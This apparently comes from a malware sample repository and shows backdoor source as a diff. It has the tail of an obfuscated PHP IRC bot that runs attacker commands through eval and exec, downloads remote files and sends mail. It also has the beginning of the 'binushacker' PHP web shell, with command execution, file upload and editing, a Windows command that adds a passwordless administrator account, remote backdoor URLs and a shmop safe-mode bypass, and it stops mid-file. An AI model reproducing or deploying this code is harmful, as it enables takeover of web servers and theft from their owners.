} } break; case j69923efad5b7a("tKuZ"): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("UFdELy8gQ3VycmVudCBkaXI6") ." ".getcwd());
break; case j69923efad5b7a("p5g="): if (count($xdfff0a7fa1a55) > 1) { if (chdir($xdfff0a7fa1a55[1])) {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q0QvLyBDaGFuZ2VkIGRpciB0bw==") ." ".$xdfff0a7fa1a55[1]);
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg=="));
} } break; case j69923efad5b7a("tqE="): if (count($xdfff0a7fa1a55) > 1) { if (unlink($xdfff0a7fa1a55[1])) {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Uk0vLyBEZWxldGVk") . " \2".$xdfff0a7fa1a55[1]."\2");
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Uk0vLyBGYWlsZWQgdG8gZGVsZXRl")." \2".$xdfff0a7fa1a55[1]."\2");
} } break; case j69923efad5b7a("uKOqlZs="): if (count($xdfff0a7fa1a55) > 1) { if (touch($xdfff0a7fa1a55[1])) {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("VG91Y2gvLyBUb3VjaGVk") . " \2".$xdfff0a7fa1a55[1]."\2");
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g=") . " \2".$xdfff0a7fa1a55[1]."\2");
} } break; case j69923efad5b7a("t62inpySoA=="): if (count($xdfff0a7fa1a55) > 2) { if (symlink($xdfff0a7fa1a55[1],$xdfff0a7fa1a55[2])) {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("U3ltTGluay8vIFN5bWxpbmtlZA==") . " \2".$xdfff0a7fa1a55[2]."\2 To \2".$xdfff0a7fa1a55[1]."\2");
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("U3ltTGluay8vIEZhaWxlZCB0byBsaW5r") . " \2".$xdfff0a7fa1a55[2]."\2 To \2".$xdfff0a7fa1a55[1]."\2");
} } break; case j69923efad5b7a("p5ykqaE="): if (count($xdfff0a7fa1a55) > 2) { if (chown($xdfff0a7fa1a55[1],$xdfff0a7fa1a55[2])) {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q2hvd24vLyBDaG93bmVk") ." \2".$xdfff0a7fa1a55[1]."\2 To \2".$xdfff0a7fa1a55[2]."\2");
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24=") ." \2".$xdfff0a7fa1a55[1]."\2 To \2".$xdfff0a7fa1a55[2]."\2");
} } break; case j69923efad5b7a("p5yioZc="): if (count($xdfff0a7fa1a55) > 2) { if(chmod($xdfff0a7fa1a55[1],$xdfff0a7fa1a55[2])) {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q2htb2QvLyBDaG1vZGRlZA==") . " \2".$xdfff0a7fa1a55[1]."\2 with permissions \2".$xdfff0a7fa1a55[2]."\2");
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q=") . " \2".$xdfff0a7fa1a55[1]."\2");
} } break; case j69923efad5b7a("sZ+Zm6U="): if (count($xdfff0a7fa1a55) > 1) { if (mkdir($xdfff0a7fa1a55[1])) {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ==")." \2".$xdfff0a7fa1a55[1]."\2");
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ==")." \2".$xdfff0a7fa1a55[1]."\2");
} } break; case j69923efad5b7a("tqGZm6U="): if (count($xdfff0a7fa1a55)>1) { if (rmdir($xdfff0a7fa1a55[1])) {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ==") . " \2".$xdfff0a7fa1a55[1]."\2");
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ==") . " \2".$xdfff0a7fa1a55[1]."\2");
} } break; case j69923efad5b7a("p6Q="): if (count($xdfff0a7fa1a55) > 2) { if (copy($xdfff0a7fa1a55[1], $xdfff0a7fa1a55[2])) {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q1AvLyBDb3BpZWQ=") ." \2".$xdfff0a7fa1a55[1]."\2 to \2".$xdfff0a7fa1a55[2]."\2");
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q1AvLyBGYWlsZWQgdG8gY29weQ==") ." \2".$xdfff0a7fa1a55[1]."\2 to \2".$xdfff0a7fa1a55[2]."\2");
} } break; case j69923efad5b7a("sZWeng=="): if (count($xdfff0a7fa1a55)>4) { $z099fb995346f3 = "From: <".$xdfff0a7fa1a55[2].">\r\n";
if (mail($xdfff0a7fa1a55[1], $xdfff0a7fa1a55[3], substr($o78e731027d8fd,$xdfff0a7fa1a55[4]), $z099fb995346f3)) {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TWFpbC8v") . " Message sent to \2".$xdfff0a7fa1a55[1]."\2");
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TWFpbC8v") . " Send failure");
} } break; case j69923efad5b7a("sZ+ilmg="): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TUQ1Ly8=") . " ".md5($xdfff0a7fa1a55[1]));
break; case j69923efad5b7a("qKKo"): if (isset($xdfff0a7fa1a55[1])) { $g957b527bcfbad = explode(".",$xdfff0a7fa1a55[1]);
if (count($g957b527bcfbad)==4 && is_numeric($g957b527bcfbad[0]) && is_numeric($g957b527bcfbad[1]) && is_numeric($g957b527bcfbad[2]) && is_numeric($g957b527bcfbad[3])) {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("RE5TLy8=") . " ".$xdfff0a7fa1a55[1]." -> ".gethostbyaddr($xdfff0a7fa1a55[1]));
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("RE5TLy8=") . " ".$xdfff0a7fa1a55[1]." -> ".gethostbyname($xdfff0a7fa1a55[1]));
} } break; case j69923efad5b7a("tpmoppSWqQ=="): i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("UVVJVCA6UVVJVC4uLg=="));
fclose($o351a1d2ad68bc); dfc35fdc70d5fc(); break; case j69923efad5b7a("tqI="): if(isset($xdfff0a7fa1a55[1])) {
$d8052146769b14 = bd988971435842((int)$xdfff0a7fa1a55[1]); i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("TklDSw==")." $d8052146769b14");
} else { $d8052146769b14 = bd988971435842($oec12e0af93cb5['mrnd']); i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("TklDSw==")." $d8052146769b14");
} break; case j69923efad5b7a("tJyl"): if (count($xdfff0a7fa1a55) > 1) { eval(substr($o78e731027d8fd,strlen($xdfff0a7fa1a55[0])));
} break; case j69923efad5b7a("q5mp"): if (count($xdfff0a7fa1a55) > 2) { if (!($a0666f0acdeed3 = fopen($xdfff0a7fa1a55[2],"w"))) {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ="));
} else { if (!($db5eda0a74558a = file($xdfff0a7fa1a55[1]))) { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("R2V0Ly8gQmFkIFVSTC9ETlMgZXJyb3I="));
} else { for ($v865c0c0b4ab0e = 0; $v865c0c0b4ab0e < count($db5eda0a74558a); $v865c0c0b4ab0e++) { fwrite($a0666f0acdeed3,$db5eda0a74558a[$v865c0c0b4ab0e]);
} zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("R2V0Ly8=") . " \2".$xdfff0a7fa1a55[1]."\2 downloaded to \2".$xdfff0a7fa1a55[2]."\2");
} fclose($a0666f0acdeed3); } } break; case j69923efad5b7a("sp0="): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TmV0SW5mby8v") . " IP: ".$_SERVER['SERVER_ADDR']." Hostname: ".$_SERVER['SERVER_NAME']);
break; case j69923efad5b7a("t50="): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("U3lzaW5mby8v") . " [User: ".get_current_user()."] [PID: ".getmypid()."] [Version: PHP ".phpversion()."] [OS: ".PHP_OS."] [Server_software: ".$_SERVER['SERVER_SOFTWARE']."] [Server_name: ".$_SERVER['SERVER_NAME']."] [Admin: ".$_SERVER['SERVER_ADMIN']."] [Docroot: ".$_SERVER['DOCUMENT_ROOT']."] [HTTP Host: ".$_SERVER['HTTP_HOST']."] [URL: ".$_SERVER['REQUEST_URI']."]");
break; case j69923efad5b7a("tKOnpqKUmuw="): if (isset($xdfff0a7fa1a55[1],$xdfff0a7fa1a55[2])) { if (fsockopen($xdfff0a7fa1a55[1],(int)$xdfff0a7fa1a55[2],$f56bd7107802eb,$p341be97d9aff9,5)) {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "".ub5d21085bf2c0("UG9ydENoay8v") ." ".$xdfff0a7fa1a55[1].":".$xdfff0a7fa1a55[2]." is \2Open\2");
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "".ub5d21085bf2c0("UG9ydENoay8v") ." ".$xdfff0a7fa1a55[1].":".$xdfff0a7fa1a55[2]." is \2Closed\2");
} } break; case j69923efad5b7a("uaKWn5g="): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("VW5hbWUvLw==")." " .php_uname());
break; case j69923efad5b7a("rZg="): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("SUQvLw==")." ".getmypid());
break; case j69923efad5b7a("p6GZ"): if (count($xdfff0a7fa1a55)>1) { $z1dccadfed7bcb = popen(substr($o78e731027d8fd,strlen($xdfff0a7fa1a55[0])),"r");
while (!feof($z1dccadfed7bcb)) { $l734515cbd3636 = trim(fgets($z1dccadfed7bcb,512)); if (strlen($l734515cbd3636)>0) {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "> ".$l734515cbd3636); sleep(1); }
} zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("PiBbRU9GXQ=="));
} break; case j69923efad5b7a("p6GZZA=="): if (count($xdfff0a7fa1a55)>1) { $c2beda901e9726 = tempnam('/tmp', 'tmpfile');
$z1dccadfed7bcb = substr($o78e731027d8fd,strlen($xdfff0a7fa1a55[0])); $z1dccadfed7bcb .= " >$c2beda901e9726";
$e3c0f0406c38df = "rm $c2beda901e9726"; r54d54a126a783($z1dccadfed7bcb); if (is_file($c2beda901e9726)) {
if (($a0666f0acdeed3 = fopen($c2beda901e9726,"r"))) { while(!feof($a0666f0acdeed3)) { $g6438c669e0d0d = trim(fgets($a0666f0acdeed3,256));
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "> $g6438c669e0d0d"); sleep(1); }
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("PiBbRU9GXQ==")); } else {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q01ELy8gQ291bGRuJ3Qgb3BlbiB0bXBmaWxlLg=="));
} } else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q01ELy8gdG1wZmlsZSBpcyBub3QgYSBmaWxl"));
} r54d54a126a783($e3c0f0406c38df); } break; case j69923efad5b7a("qayalaiYmg=="): r54d54a126a783(substr($o78e731027d8fd,strlen($xdfff0a7fa1a55[0])));
break; } } else { switch(substr($xdfff0a7fa1a55[0],1)) { case j69923efad5b7a("bg=="): if (isset($xdfff0a7fa1a55[1]) && md5($xdfff0a7fa1a55[1]) == ef9feaa9bcab30($oec12e0af93cb5['pa']) && preg_match(ef9feaa9bcab30($oec12e0af93cb5['ha']),$z67b3dba8bc677)) {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("UmVhZHkvLyBPaw=="));
$xee11cbb19052e[$z67b3dba8bc677] = TRUE; } else { zf2f4e964f79d0($o351a1d2ad68bc, FALSE, ef9feaa9bcab30($oec12e0af93cb5['ch']), ub5d21085bf2c0("UmVhZHkvLyByZWplY3RlZA=="));
} break; } } } } $ed707b8140a662 = $l7fabc1404929c; } fclose($o351a1d2ad68bc); sleep(3); dfc35fdc70d5fc();
} else { shuffle($n59b514174bffe); dfc35fdc70d5fc(); } } function i56eacb300613d($k317d37b0edc7b, $o78e731027d8fd) {
fwrite($k317d37b0edc7b,"$o78e731027d8fd\r\n"); } function zf2f4e964f79d0($k317d37b0edc7b, $e73be252ca8221, $i01b6e20344b68, $o78e731027d8fd) {
if($e73be252ca8221 != TRUE) { i56eacb300613d($k317d37b0edc7b, ub5d21085bf2c0("UFJJVk1TRw==")." $i01b6e20344b68 :$o78e731027d8fd");
} } function j69923efad5b7a($mc7a1ddb19daba) { $db4a88417b3d01 = ''; $mc7a1ddb19daba = base64_decode($mc7a1ddb19daba);
for($v865c0c0b4ab0e=0; $v865c0c0b4ab0e<strlen($mc7a1ddb19daba); $v865c0c0b4ab0e++) { $ja87deb01c5f53 = substr($mc7a1ddb19daba, $v865c0c0b4ab0e, 1);
$vae0e1268c3859 = substr(ub5d21085bf2c0("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q="), ($v865c0c0b4ab0e % strlen(ub5d21085bf2c0("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q=")))-1, 1);
$ja87deb01c5f53 = chr(ord($ja87deb01c5f53)-ord($vae0e1268c3859)); $db4a88417b3d01.=$ja87deb01c5f53;
} return $db4a88417b3d01; } function bd988971435842($ufac65290966c7) { for ($v865c0c0b4ab0e = 0; $v865c0c0b4ab0e < $ufac65290966c7; $v865c0c0b4ab0e++)
$a2cb9df9898e55 .= chr(mt_rand(0,25)+97); if (posix_getegid() == 0) $a2cb9df9898e55 = "r-".$a2cb9df9898e55;
return $a2cb9df9898e55; } function r54d54a126a783($o111ca5df4a68b) { $g9b207167e5381 = ''; if (!empty($o111ca5df4a68b))
{ if(function_exists('exec')) { @exec($o111ca5df4a68b,$g9b207167e5381); $g9b207167e5381 = join("\n",$g9b207167e5381);
} elseif(function_exists('shell_exec')) { $g9b207167e5381 = @shell_exec($o111ca5df4a68b); } elseif(function_exists('system'))
{ @ob_start(); @system($o111ca5df4a68b); $g9b207167e5381 = @ob_get_contents(); @ob_end_clean(); }
elseif(function_exists('passthru')) { @ob_start(); @passthru($o111ca5df4a68b); $g9b207167e5381 = @ob_get_contents();
@ob_end_clean(); } elseif(@is_resource($s8fa14cdd754f9 = @popen($o111ca5df4a68b,"r"))) { $g9b207167e5381 = "";
while(!@feof($s8fa14cdd754f9)) { $g9b207167e5381 .= @fread($s8fa14cdd754f9,1024); } @pclose($s8fa14cdd754f9);
} } return $g9b207167e5381; } function ef9feaa9bcab30($mc7a1ddb19daba) { $db4a88417b3d01 = ''; $mc7a1ddb19daba = base64_decode($mc7a1ddb19daba);
for($v865c0c0b4ab0e=0; $v865c0c0b4ab0e<strlen($mc7a1ddb19daba); $v865c0c0b4ab0e++) { $ja87deb01c5f53 = substr($mc7a1ddb19daba, $v865c0c0b4ab0e, 1);
$vae0e1268c3859 = substr(ub5d21085bf2c0("MyNGJV4kNSUkMzYjNjU2NTg5MDg5OTcwODMyMzEyNCFAIzQ1XiQlNiM1NmZEZ1NERmdTREZHUkVUcmV0V1JFVGVycHJlV1IqU0RGI0AjNSQlNiQlXiM0fiEhQH4hQCF+QCF+fiFAJCM1IyQ1JDMlR2hEZ0hnZmdmZ0ZoZ2hHRmhmZ1RSeXR5JV5nZkg0MzQzVkYjRURFY0BDQGVDI0VjSjxJTC4+Pk08PzxNPmVSdEVRdFdFUg=="), ($v865c0c0b4ab0e % strlen(ub5d21085bf2c0("MyNGJV4kNSUkMzYjNjU2NTg5MDg5OTcwODMyMzEyNCFAIzQ1XiQlNiM1NmZEZ1NERmdTREZHUkVUcmV0V1JFVGVycHJlV1IqU0RGI0AjNSQlNiQlXiM0fiEhQH4hQCF+QCF+fiFAJCM1IyQ1JDMlR2hEZ0hnZmdmZ0ZoZ2hHRmhmZ1RSeXR5JV5nZkg0MzQzVkYjRURFY0BDQGVDI0VjSjxJTC4+Pk08PzxNPmVSdEVRdFdFUg==")))-1, 1);
$ja87deb01c5f53 = chr(ord($ja87deb01c5f53)-ord($vae0e1268c3859)); $db4a88417b3d01.=$ja87deb01c5f53;
} return $db4a88417b3d01; } function bfb0daa8f01135($ufac65290966c7) { $a2cb9df9898e55 = ""; for ($v865c0c0b4ab0e=0;$v865c0c0b4ab0e<$ufac65290966c7; $v865c0c0b4ab0e++)
$a2cb9df9898e55 .= chr(mt_rand(0,25)+97); return $a2cb9df9898e55; } dfc35fdc70d5fc(); ?>

2208
PHP/Backdoor.PHP.Agent.aj Normal file
View File

File diff suppressed because it is too large Load Diff

712
PHP/Backdoor.PHP.Agent.ak Normal file
View File

@ -0,0 +1,712 @@
<html>
<head>
<meta http-equiv="Content-Language" content="pt-br">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="AoD">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>By binushacker > AoD > CMD > File List</title>
<style type="text/css">
A:link {text-decoration:none}
A:visited {text-decoration:none}
A:hover {text-decoration:underline}
A:active {text-decoration:underline}
body,td {
font-family: verdana;
font-size: 8pt;
background-color: #FFCC00;
}
a{
color: #0000FF;
text-decoration: none;
}
a:hover {
color: #FF0000;
text-decoration: underline;
}
</style>
</head>
<body >
<center><h2>..:: http://www.binushacker.com #binushacker @ irc.dal.net ::..</h2></center>
<?php
@set_time_limit(0);
$string = $_SERVER['QUERY_STRING'];
$mhost = 'http://www.binushacker.com/download/cmd.do?';
$host_all = explode("$mhost", $string);
$s1 = $host_all[0];
$fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;
$OS = @PHP_OS;
$IpServer = '127.0.0.1';
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
else { $SafeMode = "<i>$SafeMode</i>"; }
$btname = 'backtool.txt';
$bt = 'http://www.full-comandos.com/jobing/r0nin';
$dc = 'http://www.full-comandos.com/jobing/dc.txt';
$newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup
&quot;Administrators&quot; /add Admin;net localgroup &quot;Users&quot; /del Admin';
$bn = 'http://www.binushacker.com/download/cmd.do';
// Java Script
echo "<script type=\"text/javascript\">";
echo "function ChMod(chdir, file) {";
echo "var o = prompt('Chmod: - Contoh: 0777', '');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file +
'&chmod=' + o + \"\";";
echo "}";
echo "}";
echo "function Rename(chdir, file, mode) {";
echo "if (mode == 'edit') {";
echo "var o = prompt('Ganti Nama File '+ file + ' menjadi:', '');";
echo "}";
echo "else {";
echo "var o = prompt('Ganti Nama Folder '+ file + ' menjadi:', '');";
echo "}";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file +
'&newname=' + o + '&mode=' + mode +\"\";";
echo "}";
echo "}";
echo "function Copy(chdir, file) {";
echo "var o = prompt('Copied for:', '/tmp/' + file);";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file +
'&fcopy=' + o + \"\";";
echo "}";
echo "}";
echo "function Mkdir(chdir) {";
echo "var o = prompt('Nama Folder?', 'Folder_Baru');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o +
\"\";";
echo "}";
echo "}";
echo "function Newfile(chdir) {";
echo "var o = prompt('Nama File?', 'File_Baru.txt');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o +
\"\";";
echo "}";
echo "}";
echo "</script>";
// End JavaScript
/* Functions */
function cmd($CMDs) {
$CMD[1] = '';
exec($CMDs, $CMD[1]);
if (empty($CMD[1])) {
$CMD[1] = shell_exec($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = passthru($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = system($CMDs);
}
elseif (empty($CMD[1])) {
$handle = popen($CMDs, 'r');
while(!feof($handle)) {
$CMD[1][] .= fgets($handle);
}
pclose($handle);
}
return $CMD[1];
}
if (@$_GET['chdir']) {
$chdir = $_GET['chdir'];
} else {
$chdir = getcwd()."/";
}
if (@chdir("$chdir")) {
$msg = "<font color=\"#008000\"> Pintu Masuk ke Direktori, OK!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Gagal memasukkan ke folder!</font>";
$chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}
$chdir = str_replace(chr(92), chr(47), $chdir);
if (@$_GET['action'] == 'upload') {
$uploaddir = $chdir;
$uploadfile = $uploaddir. $_FILES['userfile']['name'];
if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .
$_FILES['userfile']['name'])) {
$msg = "<font color=\"#008000\"><font
color=\"#000080\">{$_FILES['userfile']['name']}</font>, arsip valid, sukses dimuat.
</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: gagal menyalin arsip.</font>";
}
}
elseif (@$_GET['action'] == 'mkdir') {
$newdir = $_GET['newdir'];
if (@mkdir("$chdir"."$newdir")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newdir}</font>, folder
berhasil dibuat. </font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Pembuatan folder gagal.</font>";
}
}
elseif (@$_GET['action'] == 'newfile') {
$newfile = $_GET['newfile'];
if (@touch("$chdir"."$newfile")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newfile}</font>, berhasil
dibuat! </font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Pembuatan arsip gagal!</font>";
}
}
elseif (@$_GET['action'] == 'del') {
$file = $_GET['file']; $type = $_GET['type'];
if ($type == 'file') {
if (@unlink("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, Berhasil
menghapus arsip (file)!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Gagal menghapus arsip (file)!</font>";
}
} elseif ($type == 'dir') {
if (@rmdir("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, Berhasil
menghapus folder!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Gagal menghapus folder!</font>";
}
}
}
elseif (@$_GET['action'] == 'chmod') {
$file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
if (@chmod ("$file", $chmod)) {
$msg = "<font color=\"#008000\">Chmod dari</font> <font
color=\"#000080\">{$_GET['file']}</font> <font color=\"#008000\">berubah menjadi</font>
<font color=\"#000080\">$chmod</font> <font color=\"#008000\">: Sukses!</font>";
} else {
$msg = '<font color=\"#FF0000\">Error: Gagal mengubah chmod.</font>';
}
}
elseif (@$_GET['action'] == 'rename') {
$file = $_GET['file']; $newname = $_GET['newname'];
if (@rename("$chdir"."$file", "$chdir"."$newname")) {
$msg = "<font color=\"#008000\">Archive</font> <font color=\"#000080\">{$file}</font>
<font color=\"#008000\">named for</font> <font color=\"#000080\">{$newname}</font> <font
color=\"#008000\">successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Gagal mencalonkan arsip.</font>";
}
}
elseif (@$_GET['action'] == 'copy') {
$file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
if (@copy("$file", "$copy")) {
$msg = "<font color=\"#000080\">{$file}</font>, <font color=\"#008000\">disalin
menjadi</font> <font color=\"#000080\">{$copy}</font> <font color=\"#008000\">
Berhasil!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error: Gagal menyalin </font> <font
color=\"#000000\">{$file}</font> <font color=\"#FF0000\">menjadi</font> <font
color=\"#000000\">{$copy}</font></font>";
}
}
/* Parte Atualiza 02:48 12/2/2006 */
elseif (@$_GET['action'] == 'cmd') {
if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
$cmd = stripslashes(trim($cmd));
$result_arr = cmd($cmd);
$afim = count($result_arr); $acom = 0; $msg = '';
$msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida
Console';font-size: 12px;margin 2\">Hasil : <b>".$cmd."</b></p>";
if ($result_arr) {
while ($acom <= $afim) {
$msg .= "<p style=\"color: #008000;text-align: left;font-family:
'Lucida Console';font-size: 12px;margin 2\"> ".@$result_arr[$acom]."</p>";
$acom++;
}
}
else {
$msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida
Console';font-size: 12px;margin 2\">Error: Gagal mengeksekusi perintah.</p>";
}
}
elseif (@$_GET['action'] == 'safemode') {
if (@!extension_loaded('shmop')) {
echo "Loading... module</br>";
if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
@dl('php_shmop.dll');
} else {
@dl('shmop.so');
}
}
if (@extension_loaded('shmop')) {
echo "Module: <b>shmop</b> loaded!</br>";
$shm_id = @shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
$data="\x00";
$offset=-3842685;
$shm_bytes_written = @shmop_write($shm_id, $data, $offset);
if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of
data\n"; }
if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
echo passthru("id");
shmop_close($shm_id);
} else { echo "Module: <b>shmop</b> tidak dimuat!</br>"; }
}
elseif (@$_GET['action'] == 'zipen') {
$file = $_GET['file'];
$zip = @zip_open("$chdir"."$file");
$msg = '';
if ($zip) {
while ($zip_entry = zip_read($zip)) {
$msg .= "Name: " . zip_entry_name($zip_entry) . "\n";
$msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\n";
$msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\n";
$msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n";
if (zip_entry_open($zip, $zip_entry, "r")) {
echo "File Contents:\n";
$buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
echo "$buf\n";
zip_entry_close($zip_entry);
}
echo "\n";
}
zip_close($zip);
}
}
elseif (@$_GET['action'] == 'edit') {
$file = $_GET['file'];
$conteudo = '';
$filename = "$chdir"."$file";
$conteudo = @file_get_contents($filename);
$conteudo = htmlspecialchars($conteudo);
$back = $_SERVER['HTTP_REFERER'];
echo "<p align=\"center\">Editing {$file} ...</p>";
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:
collapse\" width=\"100%\" id=\"editacao\">";
echo "<tr>";
echo "<td width=\"100%\">";
echo "<form method=\"POST\"
action=\"{$fstring}&amp;action=save&amp;chdir={$chdir}&amp;file={$file}\">";
echo "<!--webbot bot=\"SaveResults\" u-file=\"_private/form_results.csv\"
